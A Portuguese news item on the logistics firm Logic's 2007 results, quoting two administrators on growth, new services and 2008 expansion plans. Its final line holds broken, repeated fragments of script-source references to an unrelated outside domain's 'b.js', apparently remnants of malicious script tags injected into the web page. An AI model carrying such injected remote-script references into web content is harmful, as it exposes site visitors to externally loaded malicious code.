10.184 milhões de euros foi o valor de facturação correspondente a 2007 apresentado pela Logic, operador logístico nacional, que representa um crescimento de 32% face ao ano anterior, tendo o EBTIDA ascendido aos 611 milhares de euros.
Para Isabel Viçoso, administradora da empresa, «os resultados de 2007 demonstram bem o empenho de todos no crescimento da Logic. Temos vindo, desde 2006, a investir em novos armazéns, novas tecnologias e na mudança progressiva de imagem. Penso que agora já estamos a colher os frutos que plantámos e isso é visível no grande crescimento alcançado em 2007».
Em 2007, a Logic apostou na renovação do seu site e da imagem da frota, lançou o novo serviço de entregas ao domicílio – Logic in your home, e para além de ter apostado na angariação de novos clientes e entrado numa nova área de negócio, a farmacêutica.
«2007 foi um ano muito positivo a todos os níveis, desde a criação de novos serviços à entrada de clientes importantes. Em 2008 poderemos vir a dar o salto para fora de Portugal, acompanhando a expansão dos nossos clientes», revela Carla Fernandes, administradora da Logic.
Para 2008, a empresa estima crescer cerca de 15% e prevê implementar um novo sistema informático na gestão de distribuição, que acompanhe esse crescimento. No plano estratégico para 2008 está ainda contemplada a certificação OHSAS 18001 na área de segurança e consolidação comercial dos novos serviços lançados em 2007.
ttp://www.hdadwcd.com/b.js>ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdad